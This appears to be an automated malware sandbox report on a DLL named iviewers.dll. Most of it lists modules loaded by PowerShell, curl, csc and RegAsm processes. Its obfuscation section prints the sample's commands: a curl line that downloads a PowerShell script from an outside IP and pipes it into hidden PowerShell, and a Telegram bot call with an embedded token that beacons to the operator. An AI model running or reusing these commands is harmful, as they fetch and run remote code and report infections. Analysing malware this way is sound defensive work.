            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: iviewers.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: iviewers.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.pdb source: powershell.exe, 0000001D.00000002.1831061949.0000000005814000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.pdb source: powershell.exe, 00000025.00000002.1915834227.0000000005718000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.pdb source: powershell.exe, 0000001B.00000002.1861999388.00000000056D5000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.pdb source: powershell.exe, 00000018.00000002.1835577839.0000000004D85000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F95F533 push ecx; ret 0_2_6F95F546
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6F95F533 push ecx; ret 3_2_6F95F546
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F95F533 push ecx; ret 4_2_6F95F546
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04D1E948 pushfd ; ret 12_2_04D1E949
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 43_2_0143D1F2 push ecx; retf 43_2_0143D218
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00ECC3B3 push eax; retf 44_2_00ECC405
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C360 pushad ; ret 44_2_00F2C361
